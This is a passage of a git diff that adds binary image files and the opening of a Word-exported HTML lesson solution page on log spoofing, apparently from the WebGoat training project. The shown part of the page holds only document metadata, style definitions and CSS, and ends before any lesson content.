Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image012.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image012.png
new file mode 100644
index 000000000..4d3ab3e2f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image012.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image013.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image013.jpg
new file mode 100644
index 000000000..3ba19dd7e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image014.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image014.png
new file mode 100644
index 000000000..90ea086b2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image014.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image015.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image015.jpg
new file mode 100644
index 000000000..47033c76c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image016.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image016.png
new file mode 100644
index 000000000..36393c423
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image016.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image017.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image017.jpg
new file mode 100644
index 000000000..02087fd18
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image018.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image018.png
new file mode 100644
index 000000000..6fa005b7c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image018.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image019.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image019.jpg
new file mode 100644
index 000000000..fa77e0a36
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image019.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image020.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image020.png
new file mode 100644
index 000000000..43737e5d1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image020.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image021.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image021.jpg
new file mode 100644
index 000000000..9cde03d4b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image022.png b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image022.png
new file mode 100644
index 000000000..24ef81f2b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image022.png differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image023.jpg b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image023.jpg
new file mode 100644
index 000000000..8fbe215fd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/image023.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/themedata.thmx b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JavaScriptValidation_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/LogSpoofing.html b/main/project/WebContent/lesson_solutions/LogSpoofing.html
new file mode 100644
index 000000000..35fcaeaf1
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/LogSpoofing.html
@@ -0,0 +1,793 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/LogSpoofing_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/LogSpoofing_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1198</o:TotalTime>
+  <o:Created>2007-07-12T14:19:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>202</o:Words>
+  <o:Characters>1155</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>9</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1355</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/LogSpoofing_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/LogSpoofing_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
